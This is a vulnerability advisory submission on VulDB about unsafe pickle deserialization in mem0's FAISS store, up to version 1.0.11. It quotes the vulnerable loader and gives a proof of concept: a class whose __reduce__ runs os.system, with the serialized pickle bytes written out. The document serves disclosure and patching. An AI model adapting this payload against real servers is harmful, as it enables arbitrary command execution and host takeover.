提交 #805562: Mem0 <= v1.0.11 Unsafe Deserialization信息

标题	Mem0 <= v1.0.11 Unsafe Deserialization
描述	### Summary An Unsafe Deserialization via pickle.load() in mem0 allows Remote Command Execution on the server host. ### Details The vulnerability is caused by the usage of vulnerable function of pickle serialization library ([faiss.py#L94](https://github.com/mem0ai/mem0/blob/97cbff77efe49a0cc0132da5c3b4a4649facc8fc/mem0/vector_stores/faiss.py#L94)). ```python import pickle # ... def _load(self, index_path: str, docstore_path: str): """ Load FAISS index and docstore from disk. Args: index_path (str): Path to FAISS index file. docstore_path (str): Path to docstore pickle file. """ try: self.index = faiss.read_index(index_path) with open(docstore_path, "rb") as f: self.docstore, self.index_to_id = pickle.load(f) logger.info(f"Loaded FAISS index from {index_path} with {self.index.ntotal} vectors") except Exception as e: logger.warning(f"Failed to load FAISS index: {e}") self.docstore = {} self.index_to_id = {} ``` ### PoC For a simple proof of concept we're using the bytes representation of pickled object below: ```python class Evil: def __reduce__(self): return (os.system, ("touch pwned",)) ``` that is: `\x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x10touch pwned\x94\x85\x94R\x94.`. Using this payload as content of the FAISS pickled file, an attacker can execute any arbitrary system command. ### Impact Usually if attackers can control the FAISS index file, they can poison or manipulate search results by injecting malicious vectors that distort nearest-neighbor retrieval. In this case, attackers can run arbitrary system commands without any restriction (e.g. they could use a reverse shell and gain access to the server). The impact is high as the attacker can completely takeover the server host. ### References - https://docs.python.org/3/library/pickle.html - https://github.com/mem0ai/mem0/issues/3778 (original advisory) - https://github.com/mem0ai/mem0/pull/4833 (patch) ### Credits Edoardo Ottavianelli (@edoardottt)
来源	⚠️ https://github.com/mem0ai/mem0/issues/3778
用户	edoardottt (UID 94993)
提交	2026-04-15 08時42分 (2 月前)
管理	2026-05-01 11時52分 (16 days later)
状态	已接受
VulDB条目	360550 [mem0ai mem0 直到 1.0.11 faiss.py pickle.load/pickle.dump 权限提升]
积分	20

◂ 上一步一览下一步 ▸

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!